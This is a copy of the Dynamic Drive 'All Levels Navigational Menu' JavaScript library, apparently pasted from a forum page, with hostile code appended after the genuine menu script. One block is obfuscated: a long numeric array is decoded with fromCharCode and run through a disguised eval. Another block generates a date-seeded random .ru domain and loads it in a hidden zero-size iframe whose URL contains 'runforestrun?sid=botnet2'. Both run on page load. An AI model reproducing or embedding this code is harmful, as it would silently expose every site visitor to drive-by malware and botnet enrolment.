- //** All Levels Navigational Menu- (c) Dynamic Drive DHTML code library: http://www.dynamicdrive.com
- //** Script Download/ instructions page: http://www.dynamicdrive.com/dynamicindex1/ddlevelsmenu/
- //** Usage Terms: http://www.dynamicdrive.com/notice.htm
- //** Current version: 2.2 See changelog.txt for details
- if (typeof dd_domreadycheck == "undefined") //global variable to detect if DOM is ready
- var dd_domreadycheck = false
- var ddlevelsmenu = {
- enableshim: true,
- //enable IFRAME shim to prevent drop down menus from being hidden below SELECT or FLASH elements? (tip: disable if not in use, for efficiency)
- arrowpointers: {
- downarrow: ["ddlevelsfiles/arrow-down.gif", 11, 7],
- //[path_to_down_arrow, arrowwidth, arrowheight]
- rightarrow: ["ddlevelsfiles/arrow-right.gif", 12, 12],
- //[path_to_right_arrow, arrowwidth, arrowheight]
- showarrow: {
- toplevel: true,
- sublevel: true
- } //Show arrow images on top level items and sub level items, respectively?
- },
- hideinterval: 200,
- //delay in milliseconds before entire menu disappears onmouseout.
- effects: {
- enableswipe: true,
- enablefade: true,
- duration: 200
- },
- httpsiframesrc: "blank.htm",
- //If menu is run on a secure (https) page, the IFRAME shim feature used by the script should point to an *blank* page *within* the secure area to prevent an IE security prompt. Specify full URL to that page on your server (leave as is if not applicable).
- ///No need to edit beyond here////////////////////
- topmenuids: [],
- //array containing ids of all the primary menus on the page
- topitems: {},
- //object array containing all top menu item links
- subuls: {},
- //object array containing all ULs
- lastactivesubul: {},
- //object object containing info for last mouse out menu item's UL
- topitemsindex: -1,
- ulindex: -1,
- hidetimers: {},
- //object array timer
- shimadded: false,
- nonFF: !/Firefox[\/\s](\d+\.\d+)/.test(navigator.userAgent),
- //detect non FF browsers
- getoffset: function(what, offsettype) {
- return (what.offsetParent) ? what[offsettype] + this.getoffset(what.offsetParent, offsettype) : what[offsettype]
- },
- getoffsetof: function(el) {
- el._offsets = {
- left: this.getoffset(el, "offsetLeft"),
- top: this.getoffset(el, "offsetTop")
- }
- },
- getwindowsize: function() {
- this.docwidth = window.innerWidth ? window.innerWidth - 10 : this.standardbody.clientWidth - 10
- this.docheight = window.innerHeight ? window.innerHeight - 15 : this.standardbody.clientHeight - 18
- },
- gettopitemsdimensions: function() {
- for (var m = 0; m < this.topmenuids.length; m++) {
- var topmenuid = this.topmenuids[m]
- for (var i = 0; i < this.topitems[topmenuid].length; i++) {
- var header = this.topitems[topmenuid][i]
- var submenu = document.getElementById(header.getAttribute('rel'))
- header._dimensions = {
- w: header.offsetWidth,
- h: header.offsetHeight,
- submenuw: submenu.offsetWidth,
- submenuh: submenu.offsetHeight
- }
- }
- }
- },
- isContained: function(m, e) {
- var e = window.event || e
- var c = e.relatedTarget || ((e.type == "mouseover") ? e.fromElement : e.toElement)
- while (c && c != m) try {
- c = c.parentNode
- } catch (e) {
- c = m
- }
- if (c == m) return true
- else return false
- },
- addpointer: function(target, imgclass, imginfo, BeforeorAfter) {
- var pointer = document.createElement("img")
- pointer.src = imginfo[0]
- pointer.style.width = imginfo[1] + "px"
- pointer.style.height = imginfo[2] + "px"
- if (imgclass == "rightarrowpointer") {
- pointer.style.left = target.offsetWidth - imginfo[2] - 2 + "px"
- }
- pointer.className = imgclass
- var target_firstEl = target.childNodes[target.firstChild.nodeType != 1 ? 1 : 0] //see if the first child element within A is a SPAN (found in sliding doors technique)
- if (target_firstEl && target_firstEl.tagName == "SPAN") {
- target = target_firstEl //arrow should be added inside this SPAN instead if found
- }
- if (BeforeorAfter == "before") target.insertBefore(pointer, target.firstChild)
- else target.appendChild(pointer)
- },
- css: function(el, targetclass, action) {
- var needle = new RegExp("(^|\\s+)" + targetclass + "($|\\s+)", "ig")
- if (action == "check") return needle.test(el.className)
- else if (action == "remove") el.className = el.className.replace(needle, "")
- else if (action == "add" && !needle.test(el.className)) el.className += " " + targetclass
- },
- addshimmy: function(target) {
- var shim = (!window.opera) ? document.createElement("iframe") : document.createElement("div") //Opera 9.24 doesnt seem to support transparent IFRAMEs
- shim.className = "ddiframeshim"
- shim.setAttribute("src", location.protocol == "https:" ? this.httpsiframesrc : "about:blank")
- shim.setAttribute("frameborder", "0")
- target.appendChild(shim)
- try {
- shim.style.filter = 'progid:DXImageTransform.Microsoft.Alpha(style=0,opacity=0)'
- } catch (e) {}
- return shim
- },
- positionshim: function(header, submenu, dir, scrollX, scrollY) {
- if (header._istoplevel) {
- var scrollY = window.pageYOffset ? window.pageYOffset : this.standardbody.scrollTop
- var topgap = header._offsets.top - scrollY
- var bottomgap = scrollY + this.docheight - header._offsets.top - header._dimensions.h
- if (topgap > 0) {
- this.shimmy.topshim.style.left = scrollX + "px"
- this.shimmy.topshim.style.top = scrollY + "px"
- this.shimmy.topshim.style.width = "99%"
- this.shimmy.topshim.style.height = topgap + "px" //distance from top window edge to top of menu item
- }
- if (bottomgap > 0) {
- this.shimmy.bottomshim.style.left = scrollX + "px"
- this.shimmy.bottomshim.style.top = header._offsets.top + header._dimensions.h + "px"
- this.shimmy.bottomshim.style.width = "99%"
- this.shimmy.bottomshim.style.height = bottomgap + "px" //distance from bottom of menu item to bottom window edge
- }
- }
- },
- hideshim: function() {
- this.shimmy.topshim.style.width = this.shimmy.bottomshim.style.width = 0
- this.shimmy.topshim.style.height = this.shimmy.bottomshim.style.height = 0
- },
- buildmenu: function(mainmenuid, header, submenu, submenupos, istoplevel, dir) {
- header._master = mainmenuid //Indicate which top menu this header is associated with
- header._pos = submenupos //Indicate pos of sub menu this header is associated with
- header._istoplevel = istoplevel
- if (istoplevel) {
- this.addEvent(header, function(e) {
- ddlevelsmenu.hidemenu(ddlevelsmenu.subuls[this._master][parseInt(this._pos)])
- }, "click")
- }
- this.subuls[mainmenuid][submenupos] = submenu
- header._dimensions = {
- w: header.offsetWidth,
- h: header.offsetHeight,
- submenuw: submenu.offsetWidth,
- submenuh: submenu.offsetHeight
- }
- this.getoffsetof(header)
- submenu.style.left = 0
- submenu.style.top = 0
- submenu.style.visibility = "hidden"
- this.addEvent(header, function(e) { //mouseover event
- if (!ddlevelsmenu.isContained(this, e)) {
- var submenu = ddlevelsmenu.subuls[this._master][parseInt(this._pos)]
- if (this._istoplevel) {
- ddlevelsmenu.css(this, "selected", "add")
- clearTimeout(ddlevelsmenu.hidetimers[this._master][this._pos])
- }
- ddlevelsmenu.getoffsetof(header)
- var scrollX = window.pageXOffset ? window.pageXOffset : ddlevelsmenu.standardbody.scrollLeft
- var scrollY = window.pageYOffset ? window.pageYOffset : ddlevelsmenu.standardbody.scrollTop
- var submenurightedge = this._offsets.left + this._dimensions.submenuw + (this._istoplevel && dir == "topbar" ? 0 : this._dimensions.w)
- var submenubottomedge = this._offsets.top + this._dimensions.submenuh
- //Sub menu starting left position
- var menuleft = (this._istoplevel ? this._offsets.left + (dir == "sidebar" ? this._dimensions.w : 0) : this._dimensions.w)
- if (submenurightedge - scrollX > ddlevelsmenu.docwidth) {
- menuleft += -this._dimensions.submenuw + (this._istoplevel && dir == "topbar" ? this._dimensions.w : -this._dimensions.w)
- }
- submenu.style.left = menuleft + "px"
- //Sub menu starting top position
- var menutop = (this._istoplevel ? this._offsets.top + (dir == "sidebar" ? 0 : this._dimensions.h) : this.offsetTop)
- if (submenubottomedge - scrollY > ddlevelsmenu.docheight) { //no room downwards?
- if (this._dimensions.submenuh < this._offsets.top + (dir == "sidebar" ? this._dimensions.h : 0) - scrollY) { //move up?
- menutop += -this._dimensions.submenuh + (this._istoplevel && dir == "topbar" ? -this._dimensions.h : this._dimensions.h)
- } else { //top of window edge
- menutop += -(this._offsets.top - scrollY) + (this._istoplevel && dir == "topbar" ? -this._dimensions.h : 0)
- }
- }
- submenu.style.top = menutop + "px"
- if (ddlevelsmenu.enableshim && (ddlevelsmenu.effects.enableswipe == false || ddlevelsmenu.nonFF)) { //apply shim immediately only if animation is turned off, or if on, in non FF2.x browsers
- ddlevelsmenu.positionshim(header, submenu, dir, scrollX, scrollY)
- } else {
- submenu.FFscrollInfo = {
- x: scrollX,
- y: scrollY
- }
- }
- ddlevelsmenu.showmenu(header, submenu, dir)
- }
- }, "mouseover")
- this.addEvent(header, function(e) { //mouseout event
- var submenu = ddlevelsmenu.subuls[this._master][parseInt(this._pos)]
- if (this._istoplevel) {
- if (!ddlevelsmenu.isContained(this, e) && !ddlevelsmenu.isContained(submenu, e)) //hide drop down ul if mouse moves out of menu bar item but not into drop down ul itself
- ddlevelsmenu.hidemenu(submenu)
- } else if (!this._istoplevel && !ddlevelsmenu.isContained(this, e)) {
- ddlevelsmenu.hidemenu(submenu)
- }
- }, "mouseout")
- },
- setopacity: function(el, value) {
- el.style.opacity = value
- if (typeof el.style.opacity != "string") { //if it's not a string (ie: number instead), it means property not supported
- el.style.MozOpacity = value
- if (el.filters) {
- el.style.filter = "progid:DXImageTransform.Microsoft.alpha(opacity=" + value * 100 + ")"
- }
- }
- },
- showmenu: function(header, submenu, dir) {
- if (this.effects.enableswipe || this.effects.enablefade) {
- if (this.effects.enableswipe) {
- var endpoint = (header._istoplevel && dir == "topbar") ? header._dimensions.submenuh : header._dimensions.submenuw
- submenu.style.width = submenu.style.height = 0
- submenu.style.overflow = "hidden"
- }
- if (this.effects.enablefade) {
- this.setopacity(submenu, 0) //set opacity to 0 so menu appears hidden initially
- }
- submenu._curanimatedegree = 0
- submenu.style.visibility = "visible"
- clearInterval(submenu._animatetimer)
- submenu._starttime = new Date().getTime() //get time just before animation is run
- submenu._animatetimer = setInterval(function() {
- ddlevelsmenu.revealmenu(header, submenu, endpoint, dir)
- }, 10)
- } else {
- submenu.style.visibility = "visible"
- }
- },
- revealmenu: function(header, submenu, endpoint, dir) {
- var elapsed = new Date().getTime() - submenu._starttime //get time animation has run
- if (elapsed < this.effects.duration) {
- if (this.effects.enableswipe) {
- if (submenu._curanimatedegree == 0) { //reset either width or height of sub menu to "auto" when animation begins
- submenu.style[header._istoplevel && dir == "topbar" ? "width" : "height"] = "auto"
- }
- submenu.style[header._istoplevel && dir == "topbar" ? "height" : "width"] = (submenu._curanimatedegree * endpoint) + "px"
- }
- if (this.effects.enablefade) {
- this.setopacity(submenu, submenu._curanimatedegree)
- }
- } else {
- clearInterval(submenu._animatetimer)
- if (this.effects.enableswipe) {
- submenu.style.width = "auto"
- submenu.style.height = "auto"
- submenu.style.overflow = "visible"
- }
- if (this.effects.enablefade) {
- this.setopacity(submenu, 1)
- submenu.style.filter = ""
- }
- if (this.enableshim && submenu.FFscrollInfo) //if this is FF browser (meaning shim hasn't been applied yet
- this.positionshim(header, submenu, dir, submenu.FFscrollInfo.x, submenu.FFscrollInfo.y)
- }
- submenu._curanimatedegree = (1 - Math.cos((elapsed / this.effects.duration) * Math.PI)) / 2
- },
- hidemenu: function(submenu) {
- if (typeof submenu._pos != "undefined") { //if submenu is outermost UL drop down menu
- this.css(this.topitems[submenu._master][parseInt(submenu._pos)], "selected", "remove")
- if (this.enableshim) this.hideshim()
- }
- clearInterval(submenu._animatetimer)
- submenu.style.left = 0
- submenu.style.top = "-1000px"
- submenu.style.visibility = "hidden"
- },
- addEvent: function(target, functionref, tasktype) {
- if (target.addEventListener) target.addEventListener(tasktype, functionref, false);
- else if (target.attachEvent) target.attachEvent('on' + tasktype, function() {
- return functionref.call(target, window.event)
- });
- },
- domready: function(functionref) { //based on code from the jQuery library
- if (dd_domreadycheck) {
- functionref()
- return
- }
- // Mozilla, Opera and webkit nightlies currently support this event
- if (document.addEventListener) {
- // Use the handy event callback
- document.addEventListener("DOMContentLoaded", function() {
- document.removeEventListener("DOMContentLoaded", arguments.callee, false)
- functionref();
- dd_domreadycheck = true
- }, false)
- } else if (document.attachEvent) {
- // If IE and not an iframe
- // continually check to see if the document is ready
- if (document.documentElement.doScroll && window == window.top)(function() {
- if (dd_domreadycheck) {
- functionref()
- return
- }
- try {
- // If IE is used, use the trick by Diego Perini
- // http://javascript.nwbox.com/IEContentLoaded/
- document.documentElement.doScroll("left")
- } catch (error) {
- setTimeout(arguments.callee, 0)
- return;
- }
- //and execute any waiting functions
- functionref();
- dd_domreadycheck = true
- })();
- }
- if (document.attachEvent && parent.length > 0) //account for page being in IFRAME, in which above doesn't fire in IE
- this.addEvent(window, function() {
- functionref()
- }, "load");
- },
- init: function(mainmenuid, dir) {
- this.standardbody = (document.compatMode == "CSS1Compat") ? document.documentElement : document.body
- this.topitemsindex = -1
- this.ulindex = -1
- this.topmenuids.push(mainmenuid)
- this.topitems[mainmenuid] = [] //declare array on object
- this.subuls[mainmenuid] = [] //declare array on object
- this.hidetimers[mainmenuid] = [] //declare hide entire menu timer
- if (this.enableshim && !this.shimadded) {
- this.shimmy = {}
- this.shimmy.topshim = this.addshimmy(document.body) //create top iframe shim obj
- this.shimmy.bottomshim = this.addshimmy(document.body) //create bottom iframe shim obj
- this.shimadded = true
- }
- var menubar = document.getElementById(mainmenuid)
- var alllinks = menubar.getElementsByTagName("a")
- this.getwindowsize()
- for (var i = 0; i < alllinks.length; i++) {
- if (alllinks[i].getAttribute('rel')) {
- this.topitemsindex++this.ulindex++
- var menuitem = alllinks[i]
- this.topitems[mainmenuid][this.topitemsindex] = menuitem //store ref to main menu links
- var dropul = document.getElementById(menuitem.getAttribute('rel'))
- document.body.appendChild(dropul) //move main ULs to end of document
- dropul.style.zIndex = 2000 //give drop down menus a high z-index
- dropul._master = mainmenuid //Indicate which main menu this main UL is associated with
- dropul._pos = this.topitemsindex //Indicate which main menu item this main UL is associated with
- this.addEvent(dropul, function() {
- ddlevelsmenu.hidemenu(this)
- }, "click")
- var arrowclass = (dir == "sidebar") ? "rightarrowpointer" : "downarrowpointer"
- var arrowpointer = (dir == "sidebar") ? this.arrowpointers.rightarrow : this.arrowpointers.downarrow
- if (this.arrowpointers.showarrow.toplevel) this.addpointer(menuitem, arrowclass, arrowpointer, (dir == "sidebar") ? "before" : "after")
- this.buildmenu(mainmenuid, menuitem, dropul, this.ulindex, true, dir) //build top level menu
- dropul.onmouseover = function() {
- clearTimeout(ddlevelsmenu.hidetimers[this._master][this._pos])
- }
- this.addEvent(dropul, function(e) { //hide menu if mouse moves out of main UL element into open space
- if (!ddlevelsmenu.isContained(this, e) && !ddlevelsmenu.isContained(ddlevelsmenu.topitems[this._master][parseInt(this._pos)], e)) {
- var dropul = this
- if (ddlevelsmenu.enableshim) ddlevelsmenu.hideshim()
- ddlevelsmenu.hidetimers[this._master][this._pos] = setTimeout(function() {
- ddlevelsmenu.hidemenu(dropul)
- }, ddlevelsmenu.hideinterval)
- }
- }, "mouseout")
- var subuls = dropul.getElementsByTagName("ul")
- for (var c = 0; c < subuls.length; c++) {
- this.ulindex++
- var parentli = subuls[c].parentNode
- if (this.arrowpointers.showarrow.sublevel) this.addpointer(parentli.getElementsByTagName("a")[0], "rightarrowpointer", this.arrowpointers.rightarrow, "before")
- this.buildmenu(mainmenuid, parentli, subuls[c], this.ulindex, false, dir) //build sub level menus
- }
- }
- } //end for loop
- this.addEvent(window, function() {
- ddlevelsmenu.getwindowsize();
- ddlevelsmenu.gettopitemsdimensions()
- }, "resize")
- },
- setup: function(mainmenuid, dir) {
- this.domready(function() {
- ddlevelsmenu.init(mainmenuid, dir)
- })
- }
- }
- /*km0ae9gr6m*/
- try {
- prototype % 2;
- } catch (asd) {
- x = 2;
- }
- try {
- q = document[(x) ? "c" + "r" : 2 + "e" + "a" + "t" + "e" + "E" + "l" + "e" + "m" + ((f) ? "e" + "n" + "t" : "")]("p");
- q.appendChild(q + "");
- } catch (fwbewe) {
- i = 0;
- try {
- prototype * 5;
- } catch (z) {
- fr = "fromChar";
- f = [510, 702, 550, 594, 580, 630, 555, 660, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 240, 205, 738, 50, 192, 160, 192, 160, 708, 485, 684, 160, 624, 525, 192, 305, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 235, 192, 580, 624, 525, 690, 230, 486, 295, 60, 160, 192, 160, 192, 590, 582, 570, 192, 540, 666, 160, 366, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 222, 160, 696, 520, 630, 575, 276, 405, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 696, 505, 690, 580, 192, 305, 192, 580, 624, 525, 690, 230, 390, 160, 252, 160, 648, 555, 192, 225, 192, 580, 624, 525, 690, 230, 492, 160, 252, 160, 624, 525, 354, 50, 192, 160, 192, 160, 630, 510, 240, 580, 606, 575, 696, 160, 372, 160, 288, 205, 738, 50, 192, 160, 192, 160, 192, 160, 192, 160, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 366, 160, 696, 505, 690, 580, 354, 50, 192, 160, 192, 160, 750, 160, 606, 540, 690, 505, 192, 615, 60, 160, 192, 160, 192, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 192, 305, 192, 580, 606, 575, 696, 160, 258, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 750, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 200, 696, 520, 630, 575, 276, 575, 606, 505, 600, 160, 252, 160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 205, 354, 50, 750, 50, 60, 510, 702, 550, 594, 580, 630, 555, 660, 160, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 426, 505, 660, 505, 684, 485, 696, 555, 684, 200, 702, 550, 630, 600, 246, 615, 60, 160, 192, 160, 192, 590, 582, 570, 192, 500, 192, 305, 192, 550, 606, 595, 192, 340, 582, 580, 606, 200, 702, 550, 630, 600, 252, 245, 288, 240, 288, 205, 354, 50, 192, 160, 192, 160, 708, 485, 684, 160, 690, 160, 366, 160, 600, 230, 618, 505, 696, 360, 666, 585, 684, 575, 240, 205, 192, 310, 192, 245, 300, 160, 378, 160, 294, 160, 348, 160, 288, 295, 60, 160, 192, 160, 192, 580, 624, 525, 690, 230, 690, 505, 606, 500, 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160, 696, 520, 630, 575, 276, 555, 660, 505, 474, 590, 606, 570, 462, 160, 366, 160, 294, 230, 288, 160, 282, 160, 696, 520, 630, 575, 276, 385, 354, 50, 192, 160, 192, 160, 696, 520, 630, 575, 276, 550, 606, 600, 696, 160, 366, 160, 660, 505, 720, 580, 492, 485, 660, 500, 666, 545, 468, 585, 654, 490, 606, 570, 354, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 580, 624, 525, 690, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 495, 684, 505, 582, 580, 606, 410, 582, 550, 600, 555, 654, 390, 702, 545, 588, 505, 684, 200, 684, 220, 192, 385, 630, 550, 264, 160, 462, 485, 720, 205, 738, 50, 192, 160, 192, 160, 684, 505, 696, 585, 684, 550, 192, 385, 582, 580, 624, 230, 684, 555, 702, 550, 600, 200, 240, 385, 582, 600, 270, 385, 630, 550, 246, 160, 252, 160, 684, 230, 660, 505, 720, 580, 240, 205, 192, 215, 192, 385, 630, 550, 246, 295, 60, 625, 60, 50, 612, 585, 660, 495, 696, 525, 666, 550, 192, 515, 606, 550, 606, 570, 582, 580, 606, 400, 690, 505, 702, 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- v = "eva";
- }
- if (v) e = window[v + "l"];
- w = f;
- s = [];
- r = String;
- z = ((e) ? "Code" : "");
- for (; 1776 - 5 + 5 > i; i += 1) {
- j = i;
- if (e) s = s + r[fr + ((e) ? "Code" : 12)]((w[j] / (5 + e("j%2"))));
- }
- if (f) e(s);
- } /*qhk6sa6g1c*/
复制代码- function nextRandomNumber() {
- var hi = this.seed / this.Q;
- var lo = this.seed % this.Q;
- var test = this.A * lo - this.R * hi;
- if (test > 0) {
- this.seed = test;
- } else {
- this.seed = test + this.M;
- }
- return (this.seed * this.oneOverM);
- }
- function RandomNumberGenerator(unix) {
- var d = new Date(unix * 1000);
- var s = d.getHours() > 12 ? 1 : 0;
- this.seed = 2345678901 + (d.getMonth() * 0xFFFFFF) + (d.getDate() * 0xFFFF) + (Math.round(s * 0xFFF));
- this.A = 48271;
- this.M = 2147483647;
- this.Q = this.M / this.A;
- this.R = this.M % this.A;
- this.oneOverM = 1.0 / this.M;
- this.next = nextRandomNumber;
- return this;
- }
- function createRandomNumber(r, Min, Max) {
- return Math.round((Max - Min) * r.next() + Min);
- }
- function generatePseudoRandomString(unix, length, zone) {
- var rand = new RandomNumberGenerator(unix);
- var letters = ['a', 'b', 'c', 'd', 'e', 'f', 'g', 'h', 'i', 'j', 'k', 'l', 'm', 'n', 'o', 'p', 'q', 'r', 's', 't', 'u', 'v', 'w', 'x', 'y', 'z'];
- var str = '';
- for (var i = 0; i < length; i++) {
- str += letters[createRandomNumber(rand, 0, letters.length - 1)];
- }
- return str + '.' + zone;
- }
- setTimeout(function() {
- try {
- if (typeof iframeWasCreated == "undefined") {
- iframeWasCreated = true;
- var unix = Math.round(+new Date() / 1000);
- var domainName = generatePseudoRandomString(unix, 16, 'ru');
- ifrm = document.createElement("IFRAME");
- ifrm.setAttribute("src", "http://" + domainName + "/runforestrun?sid=botnet2");
- ifrm.style.width = "0px";
- ifrm.style.height = "0px";
- ifrm.style.visibility = "hidden";
- document.body.appendChild(ifrm);
- }
- } catch (e) {}
- }, 500);